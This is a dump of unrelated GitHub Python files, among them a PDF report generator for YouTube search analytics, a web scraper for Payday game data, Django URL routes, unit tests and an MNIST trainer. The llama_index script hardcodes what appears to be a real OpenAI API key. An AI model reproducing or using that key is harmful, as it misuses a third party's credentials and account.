pdf.drawString(xoverview, yoverview-20, \"Channels Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-20, \": 
\"+str(NumChannel))\n TitleText()\n pdf.drawString(xoverview, yoverview-30, \"Videos Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-30, \": \"+str(NumVideo))\n TitleText()\n pdf.drawString(xoverview, yoverview-40, \"Country Origin\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-40, \": \"+str(region))\n TitleText()\n pdf.drawString(xoverview, yoverview-50, \"Date and Time\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-50, \": \"+str(start_time))\n pdf.line(50, yoverview-70, 530, yoverview-70)\n\n\n # ------------------------------------------------------------------------\n\n ytables=yoverview-100\n HeaderText2()\n header=\"Top channels, categories and topics from channels in top search results\"\n pdf.drawInlineImage(TableChannel, 10, ytables-190, height=200,width=200*2.77)\n pdf.drawCentredString(290, ytables, header)\n\n\n\n ytables=ytables-190\n\n header=\"Top topics, categories and tags from videos in top search results\"\n pdf.drawInlineImage(TableVideos, 10, ytables-190, height=200,width=200*2.77)\n pdf.drawCentredString(290, ytables, header)\n\n ytables=ytables-190\n header=\"Various aspects of top search results\"\n pdf.drawInlineImage(HorizontalBarOverview, 50, ytables-165, height=150,width=150*3.2)\n pdf.drawCentredString(290, ytables, header)\n\n pdf.showPage()\n\n # ------------------------------------------------------------------------\n HeaderText2()\n ybar=800\n xbar1=7\n xbar2=xbar1+300\n header1=\"Age of channels in top search results\"\n header2=\"Video count of channels in top search results\"\n pdf.drawInlineImage(BarChannelAge, xbar1, ybar-160, height=140,width=280)\n pdf.drawInlineImage(BarChannelVideos, xbar2, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+150, ybar, header1)\n pdf.drawCentredString(xbar2+150, ybar, header2)\n\n ybar=ybar-200\n\n header1=\"Subscriber count of channels in top search results\"\n header2=\"View count of channels in top search results\"\n pdf.drawInlineImage(BarChannelSubscribers, xbar1, ybar-160, height=140,width=280)\n pdf.drawInlineImage(BarChannelViews, xbar2, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+150, ybar, header1)\n pdf.drawCentredString(xbar2+150, ybar, header2)\n\n ybar=ybar-200\n\n header1=\"Views of videos in top search results\"\n header2=\"Age of videos in top search results\"\n pdf.drawInlineImage(BarVideoViews, xbar1, ybar-160, height=140,width=280)\n pdf.drawInlineImage(BarVideoAges, xbar2, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+150, ybar, header1)\n pdf.drawCentredString(xbar2+150, ybar, header2)\n\n ybar=ybar-200\n header1=\"Length of videos in top search results\"\n pdf.drawInlineImage(BarVideoDuration, xbar1+150, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+300, ybar, header1)\n\n pdf.showPage()\n # ------------------------------------------------------------------------\n HeaderText2()\n yscatter=800\n xscatter=15\n header1=\"Views vs Likes in top search results\"\n pdf.drawInlineImage(ScatViewsLikes, xscatter+80, yscatter-230, height=220,width=220*1.73)\n pdf.drawCentredString(xscatter+275, yscatter, header1)\n\n header1=\"Likes vs Dislikes in top search results\"\n yscatter=yscatter-270\n pdf.drawInlineImage(ScatLikesDislikes, xscatter+80, yscatter-230, height=220,width=220*1.73)\n pdf.drawCentredString(xscatter+275, yscatter, header1)\n\n header1=\"Views vs Comments in top search results\"\n yscatter=yscatter-270\n pdf.drawInlineImage(ScatViewsComments, xscatter+80, yscatter-230, 
height=220,width=220*1.73)\n pdf.drawCentredString(xscatter+275, yscatter, header1)\n\n pdf.showPage()\n # ------------------------------------------------------------------------\n HeaderText1()\n yall=800\n xall=50\n header1=\"Detailed engagement of videos in top search results\"\n pdf.drawInlineImage(HorizontalBarAll4, xall, yall-670, height=500*1.27,width=500)\n pdf.drawCentredString(xall+240, yall, header1)\n # drawMyRuler(pdf)\n pdf.showPage()\n # ------------------------------------------------------------------------\n\n\n HeaderText1()\n header1=\"Analysis of thumbnails of videos in top search results\"\n pdf.drawCentredString(290, 800, header1)\n\n NumberImages=NumVideo\n factor=((sqrt(NumberImages/12)))\n NumRows=int(ceil(3*factor))\n NumColumns=int(ceil(4*factor))\n # print(NumRows, NumColumns)\n ImageWidth=480/NumColumns\n ImageHeight=360/NumRows\n y=770\n x=60\n count=1\n for i in range(NumRows):\n if count>NumberImages:\n break\n y=y-ImageHeight\n x=60\n for j in range(NumColumns):\n if count>NumberImages:\n break\n try:\n pdf.drawInlineImage(\"Images/\"+str(text)+\"/Thumbnails/\"+str(count)+\".jpg\", x, y, height=ImageHeight,width=ImageWidth)\n count+=1\n x=x+ImageWidth\n except:\n print(str(count)+\".jpg not available to put in collage\")\n\n\n y=370\n header=\"Top subjects present in thumbnails of videos in top search results\"\n pdf.drawInlineImage(TableThumbnail, 10, y-190, height=200,width=200*2.77)\n pdf.drawCentredString(300, y, header)\n\n\n\n pdf.save()","repo_name":"sarthak144/Relevance-Of-Youtube-Relevance","sub_path":"Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":10056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"30102651954","text":"def has_repeating_number_within_distance(measurements, k):\n last_seen_index = {}\n for idx, measurement in enumerate(measurements):\n if measurement in last_seen_index and idx - last_seen_index[measurement] <= k:\n return True\n last_seen_index[measurement] = idx\n return False\n\n\nif __name__ == '__main__':\n n, k = map(int, input('Enter n and k: ').split())\n measurements = list(map(int, input('Enter measurements: ').split()))\n print('Yes' if has_repeating_number_within_distance(measurements, k) else 'No')\n","repo_name":"DmitryFedoroff/python","sub_path":"yandex-academy/open-lectures-2022/repeating-number/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"71675873897","text":"def devuelve_ciudades(*ciudades): #el a* antes del argumento señala que va a recibir un numero indeterminado de elemento yseran en forma de tupla\n\tfor elemento in ciudades:\n\t\t#yield elemento #este se usa para acceder a la tupla completa, o de manera habitual\n\t\t#for subElemento in elemento:\t#este for es si quisieramos ingresar en los elementos de la tupla\n\t\t#\tyield subElemento\t\t\t# junto con el yield\n\t\tyield from elemento #de esta forma nos ahorramos el segundo for\n\nciudades_devueltas=devuelve_ciudades(\"CDMX\", \"Guanajuato\", \"Michoacan\", \"Guadalajara\")#cada cadena, es guardada como una tupla, asi sirve el * 
anterior\n\nprint(next(ciudades_devueltas))\nprint(next(ciudades_devueltas))","repo_name":"JozhueBrown/python-test","sub_path":"generadores_II.py","file_name":"generadores_II.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17289315620","text":"import requests\nimport pandas as pd\n\nAA_KEY = ''\nAA_ENDPOINT = 'https://www.alphavantage.co/query'\n\n# Change the amount of days to fetch data from\nTIME_INTERVAL = 2\nDESIRED_PERCENTAGE = 0.01\n\n\n## STEP 1: Use https://www.alphavantage.co\n# When STOCK price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\n\nclass Stock:\n parameters = {\n 'function': 'TIME_SERIES_DAILY_ADJUSTED',\n 'symbol': '',\n 'apikey': AA_KEY,\n }\n\n def __init__(self):\n self.data = ''\n self.closing_prices = ''\n self.symbol = ''\n self.up_down = ''\n self.price_change = 0\n\n def get_stock_data(self):\n self.parameters['symbol'] = self.symbol\n response = requests.get(AA_ENDPOINT, self.parameters)\n response.raise_for_status()\n stock_data = response.json()[\"Time Series (Daily)\"]\n return stock_data\n \n\n def analise_stock_prices(self):\n self.initialize_stock()\n stock_prices_series = pd.Series(self.closing_prices)\n price_diference = (stock_prices_series.pct_change())\n # access the percentage diference in the pd series, if needed can be further changed to address more data\n self.price_change = round(abs(price_diference[1])*100)\n if price_diference[1] >= DESIRED_PERCENTAGE:\n self.up_down = '▲'\n return True\n elif price_diference[1] <= DESIRED_PERCENTAGE * -1:\n self.up_down = '▼'\n return True\n else:\n return False\n\n def fetch_closing_prices(self):\n data_list = [value for key, value in self.data.items()]\n prices_data = []\n for day in range(TIME_INTERVAL):\n prices_data.append(float(data_list[day][\"4. 
close\"]))\n return prices_data\n\n def initialize_stock(self):\n self.data = self.get_stock_data()\n self.closing_prices = self.fetch_closing_prices()\n","repo_name":"willianyamauti/Stock-Market-Alert","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"27493123154","text":"import unittest\nfrom unittest.mock import Mock\n\nfrom test_tables import test_ids, insert_test_db\nfrom twissify.tables import TimelineIndex\nfrom twissify.storages import TimelineIndexStorage\n\n\nclass TestTimelineIndexStorage(unittest.TestCase):\n def test__create_existing_timeline_name(self):\n names = [\"home_timeline\", \"mentions_timeline\", \"retweets_of_me\"]\n ids = test_ids(names, 2)\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n insert_test_db(names, ids, storage.session())\n for name in names:\n with self.subTest(name=name):\n with self.assertRaises(ValueError):\n storage._create(name)\n\n def test__update_no_existing_timeline_name(self):\n names = [\"home_timeline\", \"mentions_timeline\", \"retweets_of_me\"]\n ids = test_ids(names, 2)\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n for name, (since_id, max_id) in zip(names, ids):\n with self.assertRaises(ValueError):\n storage._update(name, since_id=since_id, max_id=max_id)\n\n def test_create_ids(self):\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n expectation_ids = {\"since_id\": 100, \"max_id\": 2000}\n names = [\"timeline\"]\n tweets = Mock(**expectation_ids)\n storage.create_ids(names[0], tweets)\n timelineindex = TimelineIndex.find_by_name(names[0], storage.session())\n self.assertEqual(timelineindex.since_id, expectation_ids[\"since_id\"])\n self.assertEqual(timelineindex.max_id, expectation_ids[\"max_id\"])\n\n def test_update_ids(self):\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n names = [\"timeline\"]\n ids = test_ids(names, 2)\n expectation_ids = {\"since_id\": 100, \"max_id\": 2000}\n session = storage.session()\n insert_test_db(names, ids, session)\n tweets = Mock(since_id=expectation_ids[\"since_id\"],\n max_id=expectation_ids[\"max_id\"])\n storage.update_ids(names[0], tweets)\n timelineindex = TimelineIndex.find_by_name(names[0], session)\n self.assertEqual(timelineindex.since_id, expectation_ids[\"since_id\"])\n self.assertEqual(timelineindex.max_id, expectation_ids[\"max_id\"])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"A03ki/uecbbs","sub_path":"tests/test_storages.py","file_name":"test_storages.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"99161147","text":"import os\r\nimport tiktoken\r\nimport weaviate\r\nfrom llama_index import ServiceContext, LLMPredictor, OpenAIEmbedding, PromptHelper\r\nfrom llama_index.llms import OpenAI\r\nfrom llama_index.text_splitter import TokenTextSplitter\r\nfrom llama_index.node_parser import SimpleNodeParser\r\nfrom llama_index import VectorStoreIndex, SimpleDirectoryReader\r\nfrom llama_index import set_global_service_context\r\n\r\nos.environ['OPENAI_API_KEY'] = \"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\"\r\n\r\ndocuments = SimpleDirectoryReader(input_dir='../GenChef/').load_data()\r\n\r\ntext_splitter = TokenTextSplitter(\r\n separator=\" \",\r\n chunk_size=1024,\r\n chunk_overlap=20,\r\n backup_separators=[\"\\n\"],\r\n 
tokenizer=tiktoken.encoding_for_model(\"gpt-3.5-turbo\").encode\r\n)\r\n\r\nnode_parser = SimpleNodeParser.from_defaults(\r\n text_splitter = TokenTextSplitter()\r\n)\r\n\r\nllm = OpenAI(model='gpt-3.5-turbo', temperature=0, max_tokens=256)\r\nembed_model = OpenAIEmbedding()\r\n\r\nprompt_helper = PromptHelper(\r\n context_window=4096, \r\n num_output=256, \r\n chunk_overlap_ratio=0.1, \r\n chunk_size_limit=None\r\n)\r\n\r\nservice_context = ServiceContext.from_defaults(\r\n llm=llm,\r\n embed_model=embed_model,\r\n node_parser=node_parser,\r\n prompt_helper=prompt_helper\r\n)\r\n\r\nindex = VectorStoreIndex.from_documents(\r\n documents, \r\n service_context = service_context\r\n)\r\n\r\nquery_engine = index.as_query_engine(service_context=service_context)\r\nresponse = query_engine.query(\"What does feature extraction take place?\")\r\nprint(response)","repo_name":"T3CH3Y/GenChef","sub_path":"raketest.py","file_name":"raketest.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"38768392657","text":"from functools import cached_property\n\nfrom django.http import HttpRequest\n\nfrom sentry.middleware.proxy import SetRemoteAddrFromForwardedFor\nfrom sentry.testutils import TestCase\n\n\nclass SetRemoteAddrFromForwardedForTestCase(TestCase):\n middleware = cached_property(SetRemoteAddrFromForwardedFor)\n\n def test_ipv4(self):\n request = HttpRequest()\n request.META[\"HTTP_X_FORWARDED_FOR\"] = \"8.8.8.8:80,8.8.4.4\"\n self.middleware.process_request(request)\n assert request.META[\"REMOTE_ADDR\"] == \"8.8.8.8\"\n\n def test_ipv4_whitespace(self):\n request = HttpRequest()\n request.META[\"HTTP_X_FORWARDED_FOR\"] = \"8.8.8.8:80 \"\n self.middleware.process_request(request)\n assert request.META[\"REMOTE_ADDR\"] == \"8.8.8.8\"\n\n def test_ipv6(self):\n request = HttpRequest()\n request.META[\"HTTP_X_FORWARDED_FOR\"] = \"2001:4860:4860::8888,2001:4860:4860::8844\"\n self.middleware.process_request(request)\n assert request.META[\"REMOTE_ADDR\"] == \"2001:4860:4860::8888\"\n","repo_name":"adityamillind98/sentry","sub_path":"tests/sentry/middleware/test_proxy.py","file_name":"test_proxy.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"74305596455","text":"import requests\nimport lxml.html as lh\nimport json\nimport os\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36\"\n}\n\n\ndoubleNames = {\n \"Bank Heist\": [\"Bank Heist: Deposit\", \"Bank Heist: Cash\", \"Bank Heist: Gold\", \"Bank Heist: Random\"],\n \"Transport\": [\n \"Transport: Crossroads\",\n \"Transport: Downtown\",\n \"Transport: Harbor\",\n \"Transport: Park\",\n \"Transport: Underpass\",\n ],\n}\n\nclassics = [\n \"Diamond Heist\",\n \"First World Bank\",\n \"Green Bridge\",\n \"Heat Street\",\n \"No Mercy\",\n \"Panic Room\",\n \"Slaughterhouse\",\n \"Counterfeit\",\n \"Undercover\",\n]\n\n\ndef HandlePayday2Heists():\n print(\"Parsing Payday 2 Heists...\")\n\n page = requests.get(\"https://payday.fandom.com/wiki/Category:PAYDAY_2_heists#Heists\", headers=headers)\n doc = lh.fromstring(page.content)\n scrapedHeists = {}\n tableContent = doc.xpath(\"//table[@class='navbox']\")[0][0].text_content().replace(\"\\n\\n\", \"===SEP===\\n\")\n\n for x in tableContent.split(\"===SEP===\"):\n x = x.replace(\"\\n\", \"\")\n if \"•\" not in x:\n 
continue\n x = (\n x.replace(\"Hector: Firestarter\", \"• Firestarter\")\n .replace(\"The Continental: Brooklyn 10-10\", \" • Brooklyn 10-10\")\n .replace(\"NightmareBasic: Flash Drive\", \"Nightmare • Flash Drive\")\n .replace(\"Other: Safe House Raid\", \" • Safe House Raid\")\n .replace(\"Watchdogs Jimmy:\", \"Watchdogs •\")\n .replace(\"Event: Cursed\", \" • Cursed\")\n .replace(\"The Butcher: \", \" \")\n )\n\n for heist in x.split(\"•\"):\n heist = heist.strip().rstrip()\n if heist in classics:\n heist += \" (Payday 2)\"\n print(f\"Requesting heist: {heist}\")\n heistPage = requests.get(f\"https://payday.fandom.com/wiki/{heist}\", headers=headers)\n heistDoc = lh.fromstring(heistPage.content)\n # div -> table -> tbody\n heistTable = heistDoc.xpath(\"//div[@class='mw-parser-output']\")[0]\n\n for foo in heistTable:\n if (\n foo.get(\"style\")\n == \"background-color:#131313; width:309px; float:right; clear:right; margin-left:.5em; font-size:smaller; line-height:1.5em; color:white\"\n ):\n heistTable = foo[0]\n break\n\n contractor = heistTable[3][1].text_content().replace(\"\\n\", \"\") # Who gives the heist out\n length = int(heistTable[4][1].text_content().replace(\"\\n\", \"\")) # Length of heist in days\n loudOrStealth = heistTable[5][1].text_content().replace(\"\\n\", \"\").split(\" / \") # Loud, Stealth\n print(f'Found heist \"{heist}\" from {contractor} of length {length} day(s) ({loudOrStealth})')\n\n loudable = loudOrStealth[0] == \"✔\"\n stealthable = loudOrStealth[1] == \"✔\"\n\n if heist in doubleNames:\n for doubleName in doubleNames[heist]:\n scrapedHeists.update(\n {\n doubleName: {\n \"contractor\": contractor,\n \"days\": length,\n \"stealthable\": stealthable,\n \"loudable\": loudable,\n }\n }\n )\n else:\n scrapedHeists.update(\n {\n heist: {\n \"contractor\": contractor,\n \"days\": length,\n \"stealthable\": stealthable,\n \"loudable\": loudable,\n }\n }\n )\n return scrapedHeists\n\n\ndef HandlePayday2Gear():\n print(\"Parsing Payday 2 Weapons...\")\n\n # Melee needs to be handled differently.\n typeToLink = {\n \"Primary\": \"https://payday.fandom.com/wiki/Category:Primary_weapons_(Payday_2)\",\n \"Secondary\": \"https://payday.fandom.com/wiki/Category:Secondary_weapons_(Payday_2)\",\n \"Throwable\": \"https://payday.fandom.com/wiki/Category:Throwable_weapons\",\n }\n weaponTypes = {\"Primary\": [], \"Secondary\": [], \"Throwable\": [], \"Melee\": []}\n\n for wepType in typeToLink:\n page = requests.get(typeToLink[wepType], headers=headers)\n if not page:\n return\n doc = lh.fromstring(page.content)\n for link in doc.xpath(\"//a[@class='category-page__member-link']\"):\n wepName = link.text_content().replace(\"\\n\", \"\").replace(\" (Payday 2)\", \"\").replace(\"\\u2019\", \"'\")\n if \".png\" in wepName or \"Category:\" in wepName or \"File:\" in wepName:\n continue\n print(f\"Parsing gun: {wepName}\")\n weaponTypes[wepType] += [wepName]\n\n # Now to handle melee\n page = requests.get(\"https://payday.fandom.com/wiki/Category:Melee\", headers=headers)\n if not page:\n return\n doc = lh.fromstring(page.content)\n trElements = doc.xpath(\"//tr\")[5:]\n for tableRow in trElements:\n meleeName = tableRow[0].text_content().replace(\"\\n\", \"\").replace(\"\\u00B4\", \"'\")\n\n print(f\"Parsing melee weapon: {meleeName}\")\n weaponTypes[\"Melee\"] += [meleeName]\n return weaponTypes\n\n\n# Hardcoded lol\nheists = {\n \"__comment1\": \"All data scraped from: https://payday.fandom.com/wiki/Category:PAYDAY_2_heists#Heists and 
https://payday.fandom.com/wiki/PAYDAY:_The_Heist#Heists\",\n \"Payday2\": {},\n \"Payday1\": {\n \"First World Bank\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": True, \"loudable\": True},\n \"Heat Street\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Panic Room\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Green Bridge\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Diamond Heist\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": True, \"loudable\": True},\n \"Slaughterhouse\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Undercover\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Counterfeit\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"No Mercy\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n },\n}\n\nheists[\"Payday2\"] = HandlePayday2Heists()\n\nwith open(\"../js/data/heists.json\", \"w\") as outfile:\n json.dump(heists, outfile, indent=4)\n\n# Hardcoded cause its not like Payday 1 is getting updated lol\ngear = {\n \"Payday2\": {},\n \"Payday1\": {\n \"Primary\": [\n \"AMCAR-4\",\n \"Reinbeck\",\n \"M308\",\n \"Brenner 21\",\n \"AK-47\",\n \"Mark 11\",\n \"Locomotive 12G\",\n \"Compact-5\",\n \"GL40\",\n ],\n \"Secondary\": [\"B9-S\", \"Bronco .44\", \"Crosskill .45\", \"STRYK\"],\n \"Melee\": [\"Knife\"],\n },\n}\ngear[\"Payday2\"] = HandlePayday2Gear()\n\nwith open(\"../js/data/gear.json\", \"w\") as outfile:\n json.dump(gear, outfile, indent=4)\n","repo_name":"FromDarkHell/PaydayRoulette","sub_path":"tools/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18369821529","text":"n = int(input())\nA = [int(input()) for _ in range(n)]\n\nB = []\nimport bisect\nfor i, a in enumerate(A):\n if len(B) == 0:\n B.append(-a)\n else:\n j = bisect.bisect_right(B, -a)\n #print(j)\n if j == len(B):\n B.append(-a)\n elif j == 0:\n B[0] = -a\n else:\n B[j] = -a\n #print(B)\n#print(B)\nprint(len(B))\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02973/s693253730.py","file_name":"s693253730.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"21183690646","text":"\"\"\"funread_backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n #path('accounts/', include('AuthApp.urls')),\n path('users/',include('Users.urls')),\n path('books/',include('Books.urls')),\n path('pages/',include('Pages.urls')),\n path('widget/',include('Widget.urls')),\n path('file/',include('Files.urls')),\n path('folder/',include('folder.urls')),\n path('Tags/',include('Tags.urls')),\n path('email/', include('Mailer.urls')),\n path('roles/', include('Roles.urls')),\n path('userroles/',include('Userroles.urls')),\n path('author/', include('Author.urls')),\n path('sharedbooks/', include('Sharedbooks.urls')),\n path('grades/', include('Grades.urls')),\n path('institute/', include('Institute.urls')),\n path('studentsgroups/', include('StudentsGroups.urls')),\n path('tagsperpage/', include('TagsPerPage.urls')),\n path('classes/', include('Classes.urls')),\n path('classeslog/', include('ClassesLog.urls')),\n path('booksPerClasses/', include('BooksPerClasses.urls')),\n path('groupsPerClasses/', include('GroupsPerClasses.urls')),\n path('Media/', include('Media.urls')),\n path('join/', include('Joins.urls')),\n path('GroupsCreate/', include('GroupsCreate.urls')),\n path('Options/', include('Options.urls')),\n path('bookdilemma/',include('BooksDilemma.urls')),\n path('translate/',include('TranslateApp.urls')),\n path('Subtitled/',include('Subtitled.urls'))\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Funread/funread","sub_path":"funread_backend/funread_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73488715496","text":"def unique_words_count(arr):\n\tunique_words = len(arr)\n\t\n\trepeated_words = {}\n\n\tfor word in arr:\n\t\tcount = 1\n\t\ti = arr.index(word)\n\t\tfor w in arr[i+1:]:\n\t\t\tif word == w:\n\t\t\t\tcount+=1\n\n\t\tisPresent = False\n\n\t\tfor w2 in repeated_words:\n\t\t\tif word == w2:\n\t\t\t\tisPresent = True\n\n\t\tif isPresent == False:\n\t\t\trepeated_words[word] = count\n\n\tunique_words = len(repeated_words)\n\n\treturn unique_words\n\n","repo_name":"tdhris/HackBulgaria","sub_path":"Week0/unique_words_count/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5786189749","text":"import sys\nimport os\nimport numpy as np\n\n\ndef write_predictions(fname, arr):\n np.savetxt(fname, arr, fmt=\"%d\", delimiter=\"\\n\")\n\n\ndef run(x_train, y_train, x_test, batch_size, hidden_layer_list, activation):\n num_classes = 5\n\n # Cool Stuff\n \n predictions = [1 ,0, 1]\n return predictions\n\n\ndef main():\n x_train = sys.argv[1]\n y_train = sys.argv[2]\n x_test = sys.argv[3]\n output_file = sys.argv[4]\n batch_size = int(sys.argv[5])\n hidden_layer_list = [int(i) for i in sys.argv[6].split()]\n activation = sys.argv[7]\n\n output = run(x_train, y_train, x_test, batch_size, hidden_layer_list, activation)\n write_predictions(output_file, output)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"chiragmohapatra/COL774","sub_path":"assignment3/2016CSZ8119/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"8726849328","text":"from ui.src.crack_window import CrackWindow\nfrom ui.src.encryption_window import EncryptionWindow\nfrom ui.src.window_utils import error_warning\nfrom encryption.encrypt import Encryptor\nfrom decryption.decrypt import CrackThread\n\n\nclass WindowController:\n def __init__(self) -> None:\n self.encryptor = Encryptor()\n self.crack_win = CrackWindow()\n self.encryption_win = EncryptionWindow()\n self.crack_thread = CrackThread()\n \n self.crack_win.hide()\n self.encryption_win.show()\n\n def init(self):\n self.crack_win.init()\n self.encryption_win.init()\n self.encryptor.init()\n\n self.crack_win.change_window_signal.connect(self.show_encryption_window)\n self.encryption_win.change_window_signal.connect(self.show_crack_window)\n\n self.encryption_win.generate_signal.connect(self.generate_text)\n self.crack_win.crack_signal.connect(self.crack)\n\n def show_encryption_window(self, mode: str) -> None:\n self.crack_win.hide()\n self.encryption_win.window_mode_init(mode=mode)\n self.encryption_win.show()\n\n def show_crack_window(self):\n self.encryption_win.hide()\n self.crack_win.show()\n\n def generate_text(self, data_dict: dict):\n try:\n if data_dict[\"key\"] != \"\":\n self.encryptor.key_init([int(x) for x in data_dict[\"key\"]])\n\n if data_dict[\"mode\"] == EncryptionWindow.ENCRYPT:\n if data_dict[\"codeset\"] == \"binary\":\n text = self.encryptor.encrypt_binary([int(x) for x in data_dict[\"text\"]], is_decrypt=False)\n text = self.to_string(text)\n else:\n text = self.encryptor.encrypt_string(data_dict[\"text\"], is_decrypt=False)\n else:\n if data_dict[\"codeset\"] == \"binary\":\n text = self.encryptor.encrypt_binary([int(x) for x in data_dict[\"text\"]], is_decrypt=True)\n text = self.to_string(text)\n else:\n text = self.encryptor.encrypt_string(data_dict[\"text\"], is_decrypt=True)\n\n text = ''.join(text)\n if data_dict[\"key\"] == \"\":\n text = 'encryption text: \\n' + ''.join(map(str, text)) + '\\n\\n' + 'encryption key: \\n' + ''.join(map(str, self.encryptor.get_key()))\n self.encryption_win.show_result(text)\n except Exception as e:\n error_warning(\"Some error happened, please enter again or restart the program ! \")\n\n def crack(self, data_dict: dict):\n try:\n print(data_dict[\"pn_text\"])\n print(data_dict[\"en_text\"])\n print(data_dict[\"codeset\"])\n if data_dict[\"codeset\"] == \"unicode\":\n res = \"\"\n else:\n self.crack_thread.solve(data_dict[\"pn_text\"], data_dict[\"en_text\"])\n res = \"Possible keys are:\\n\"\n for key in self.crack_thread.get_keys():\n res += key\n res += '\\n'\n res = res + \"\\nSpent time: \" + '{:.6}s'.format(str(self.crack_thread.get_time())) + '\\n'\n\n self.crack_win.show_result(res)\n except Exception as e:\n error_warning(\"Some error happened, please enter again or restart the program ! 
\")\n\n def to_string(self, text):\n res = []\n for each in text:\n for x in each:\n res.append(str(x))\n\n return res\n ","repo_name":"Jiewoe/Simple_DES","sub_path":"ui/src/window_controller.py","file_name":"window_controller.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9286396225","text":"import tensorflow as tf\nfrom Diplomovka.Classifiers.K_F_MNIST.K_F_MNIST import K_F_MNIST\nfrom Diplomovka.Classifiers.Classifier_Trainer import Classifier_Trainer as Trainer\nimport Diplomovka.Classifiers.Classifier_utils as utils\n\n\n# Skript natrénuje architektúru K_F_MNIST na datasete MNIST\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()\n\ndef normalize(imgs):\n\treturn (imgs - 127.5) / 127.5\n# Upravi tenzor na tvar [POCET,28,28,1]\ntrain_images = train_images.reshape(train_images.shape[0], 28, 28, 1).astype('float32')\n# Normalizuje hodnoty pixelov do -1;1\ntrain_images = (train_images - 127.5) / 127.5\n\ntest_images = test_images.reshape(test_images.shape[0], 28, 28, 1).astype('float32')\ntest_images = (test_images - 127.5) / 127.5\n\ndef train_gen():\n\tfor img,label in zip(train_images,train_labels):\n\t\tlabel = tf.one_hot(label, 10)\n\t\tyield img,label\n\ndef test_gen():\n\tfor img,label in zip(test_images,test_labels):\n\t\tlabel = tf.one_hot(label,10)\n\n\t\tyield img,label\n\nbatch_size = 32\n\ntrain_dataset = tf.data.Dataset.from_generator(train_gen,(tf.float32,tf.int64)).batch(batch_size)\ntest_dataset = tf.data.Dataset.from_generator(test_gen,(tf.float32,tf.int64)).batch(batch_size)\n\nclassifier = 